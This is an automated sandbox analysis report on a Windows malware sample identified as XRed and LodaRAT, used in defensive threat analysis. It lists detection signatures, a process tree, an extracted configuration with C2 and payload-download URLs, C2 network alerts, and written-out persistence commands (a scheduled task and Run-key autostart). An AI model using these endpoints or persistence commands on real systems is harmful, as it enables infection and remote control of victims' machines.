Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AYRASY.exe

Overview

General Information

Sample name:AYRASY.exe
Analysis ID:1582334
MD5:07e25c260c13b82cd867daef02255c82
SHA1:ebc6562d3eb2a877d8cfeafcada1e1af1a66e208
SHA256:72d043dcd766da3f32477c3c1612165b2124f347013bbb69ba3da85eaf9e3d40
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • AYRASY.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\AYRASY.exe" MD5: 07E25C260C13B82CD867DAEF02255C82)
    • ._cache_AYRASY.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\._cache_AYRASY.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
      • cmd.exe (PID: 1916 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 4328 cmdline: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 3460 cmdline: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 5048 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 27C056CC4DAFB6B3161272E800C85E55)
      • WerFault.exe (PID: 7888 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 3404 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • YOABSG.exe (PID: 5672 cmdline: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • Synaptics.exe (PID: 7704 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 27C056CC4DAFB6B3161272E800C85E55)
  • YOABSG.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 5804 cmdline: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • YOABSG.exe (PID: 4092 cmdline: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe MD5: 8E44132C27ADC94100C8D8BE5D4AD041)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
AYRASY.exeJoeSecurity_XRedYara detected XRedJoe Security
    AYRASY.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRATJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\WBHUSK.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          C:\ProgramData\Synaptics\RCX4413.tmpJoeSecurity_XRedYara detected XRedJoe Security
            C:\ProgramData\Synaptics\RCX4413.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\Users\user\Documents\GAOBCVIQIJ\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
                C:\Users\user\Documents\GAOBCVIQIJ\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  Click to see the 2 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  00000007.00000002.3411280080.0000000002D20000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000007.00000002.3411537097.0000000002D78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000007.00000002.3411537097.0000000002D97000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                        00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                          00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                            Click to see the 6 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            0.0.AYRASY.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                              0.0.AYRASY.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Potentially Suspicious Malware Callback Communication
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_AYRASY.exe, Initiated: true, ProcessId: 6564, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49759
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_AYRASY.exe, ProcessId: 6564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WBHUSK
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_AYRASY.exe, ProcessId: 6564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, CommandLine: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1916, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1, ProcessId: 4328, ProcessName: schtasks.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_AYRASY.exe" , ParentImage: C:\Users\user\Desktop\._cache_AYRASY.exe, ParentProcessId: 6564, ParentProcessName: ._cache_AYRASY.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, ProcessId: 3460, ProcessName: wscript.exe
                                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AYRASY.exe, ProcessId: 6600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Sigma detected: Office Macro File Creation
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 5048, TargetFilename: C:\Users\user\AppData\Local\Temp\eLc9RiO7.xlsm

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:24:23.689476+010020448871A Network Trojan was detected192.168.2.649785142.250.186.46443TCP
                                2024-12-30T11:24:23.690792+010020448871A Network Trojan was detected192.168.2.649786142.250.186.46443TCP
                                2024-12-30T11:24:24.663897+010020448871A Network Trojan was detected192.168.2.649802142.250.186.46443TCP
                                2024-12-30T11:24:24.787303+010020448871A Network Trojan was detected192.168.2.649803142.250.186.46443TCP
                                2024-12-30T11:24:25.669103+010020448871A Network Trojan was detected192.168.2.649813142.250.186.46443TCP
                                2024-12-30T11:24:25.777972+010020448871A Network Trojan was detected192.168.2.649816142.250.186.46443TCP
                                2024-12-30T11:24:26.806878+010020448871A Network Trojan was detected192.168.2.649824142.250.186.46443TCP
                                2024-12-30T11:24:27.033307+010020448871A Network Trojan was detected192.168.2.649825142.250.186.46443TCP
                                2024-12-30T11:24:27.783272+010020448871A Network Trojan was detected192.168.2.649836142.250.186.46443TCP
                                2024-12-30T11:24:28.393374+010020448871A Network Trojan was detected192.168.2.649845142.250.186.46443TCP
                                2024-12-30T11:24:28.911174+010020448871A Network Trojan was detected192.168.2.649852142.250.186.46443TCP
                                2024-12-30T11:24:29.360483+010020448871A Network Trojan was detected192.168.2.649859142.250.186.46443TCP
                                2024-12-30T11:24:29.965830+010020448871A Network Trojan was detected192.168.2.649861142.250.186.46443TCP
                                2024-12-30T11:24:35.945263+010020448871A Network Trojan was detected192.168.2.649867142.250.186.46443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:24:18.707018+010028221161Malware Command and Control Activity Detected192.168.2.649759172.111.138.1005552TCP
                                2024-12-30T11:25:03.966257+010028221161Malware Command and Control Activity Detected192.168.2.650039172.111.138.1005552TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:25:18.107770+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.650039TCP
                                2024-12-30T11:25:55.779991+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.650039TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:24:24.009667+010028326171Malware Command and Control Activity Detected192.168.2.64979669.42.215.25280TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:24:01.975248+010028498851Malware Command and Control Activity Detected192.168.2.649979172.111.138.1005552TCP
                                2024-12-30T11:24:01.975248+010028498851Malware Command and Control Activity Detected192.168.2.650039172.111.138.1005552TCP
                                2024-12-30T11:24:01.975248+010028498851Malware Command and Control Activity Detected192.168.2.649850172.111.138.1005552TCP
                                2024-12-30T11:24:01.975248+010028498851Malware Command and Control Activity Detected192.168.2.649923172.111.138.1005552TCP
                                2024-12-30T11:24:01.975248+010028498851Malware Command and Control Activity Detected192.168.2.650037172.111.138.1005552TCP
                                2024-12-30T11:24:01.975248+010028498851Malware Command and Control Activity Detected192.168.2.649759172.111.138.1005552TCP
                                2024-12-30T11:24:18.707018+010028498851Malware Command and Control Activity Detected192.168.2.649759172.111.138.1005552TCP
                                2024-12-30T11:24:27.777887+010028498851Malware Command and Control Activity Detected192.168.2.649850172.111.138.1005552TCP
                                2024-12-30T11:24:36.793999+010028498851Malware Command and Control Activity Detected192.168.2.649923172.111.138.1005552TCP
                                2024-12-30T11:24:45.810968+010028498851Malware Command and Control Activity Detected192.168.2.649979172.111.138.1005552TCP
                                2024-12-30T11:24:54.840629+010028498851Malware Command and Control Activity Detected192.168.2.650037172.111.138.1005552TCP
                                2024-12-30T11:25:03.966257+010028498851Malware Command and Control Activity Detected192.168.2.650039172.111.138.1005552TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: AYRASY.exeAvira: detected
                                Source: AYRASY.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: http://xred.site50.net/syn/SUpdate.ini0.Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dl8Avira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\WBHUSK.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\ProgramData\Synaptics\RCX4413.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCX4413.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Found malware configuration
                                Source: AYRASY.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\Synaptics\RCX4413.tmpReversingLabs: Detection: 100%
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeReversingLabs: Detection: 47%
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeReversingLabs: Detection: 47%
                                Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1ReversingLabs: Detection: 100%
                                Multi AV Scanner detection for submitted file
                                Source: AYRASY.exeReversingLabs: Detection: 92%
                                Source: AYRASY.exeVirustotal: Detection: 87%Perma Link
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCX4413.tmpJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1Joe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: AYRASY.exeJoe Sandbox ML: detected
                                Source: AYRASY.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49805 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49804 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49816 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49845 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49852 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49853 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.6:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49859 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49867 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49913 version: TLS 1.2
                                Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: AYRASY.exeBinary or memory string: [autorun]
                                Source: AYRASY.exeBinary or memory string: [autorun]
                                Source: AYRASY.exeBinary or memory string: autorun.inf
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0018DD92
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C2044
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C219F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001C24A9
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_001B6B3F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_001B6E4A
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001BF350
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BFD47 FindFirstFileW,FindClose,2_2_001BFD47
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_001BFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A02044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A02044
